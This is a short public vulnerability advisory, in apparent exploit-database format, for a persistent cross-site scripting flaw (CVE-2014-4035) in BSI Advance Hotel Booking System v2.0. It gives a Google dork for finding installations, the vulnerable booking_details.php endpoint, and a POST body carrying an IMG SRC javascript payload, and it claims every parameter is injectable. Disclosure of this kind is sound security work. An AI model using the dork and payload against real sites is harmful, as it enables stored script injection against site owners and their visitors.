Share
# Exploit Title:BSI Advance Hotel Booking System Persistent XSS  
# Google Dork: intext:Hotel Booking System v2.0 ยฉ 2008 - 2012 Copyright Best Soft Inc  
# Date: Wed Jun 4 2014  
# Exploit Author: Angelo Ruwantha  
# Vendor Homepage: http://www.bestsoftinc.com  
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html  
# Version: V2.0  
# Tested on: archlinux  
# CVE : CVE-2014-4035  
  
Vulnerability  
========================  
  
[+]Method:POST  
  
1.http://URL/hotel-booking/booking_details.php (;persistent XSS)  
  
allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=  
  
  
every parameter injectable :)